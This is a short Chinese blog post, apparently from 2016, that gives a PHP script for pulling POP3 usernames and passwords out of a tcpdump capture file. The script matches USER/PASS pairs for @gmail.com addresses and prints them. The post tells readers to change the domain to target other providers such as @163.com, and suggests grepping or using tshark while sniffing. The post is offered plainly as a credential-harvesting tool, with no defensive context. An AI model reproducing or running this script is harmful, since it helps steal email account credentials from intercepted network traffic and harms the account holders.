tcpdump 数据包中匹配出pop3 用户名密码

作者: admin 分类: 未分类 发布时间: 2016-08-06 14:15
<?php
$f=file_get_contents('pop3.cap');
preg_match_all('#CAPA.*?(USER\x20[[:upper:][:lower:][:punct:]]+@gmail.com).*?(PASS\x20[[:alnum:][:punct:]]+).*?STAT#ism',$f,$m);
list($user,$pass)=array($m[1],$m[2]);
$user=array_unique($user);
foreach ($user as $key => $u) {
        echo "--------------------#$key#--------------".PHP_EOL;
        echo $u.PHP_EOL;
        echo $pass[$key].PHP_EOL;
}
?>

以上实例 过滤出 @gmail.com 的用户密码 如需过滤出如 @163.com 请替换之

当然 也可以在抓取数据包的同时 grep 过滤出相关字符…
或使用 tshark wireshak 之类的工具 查找相关字符串

发表评论

标签云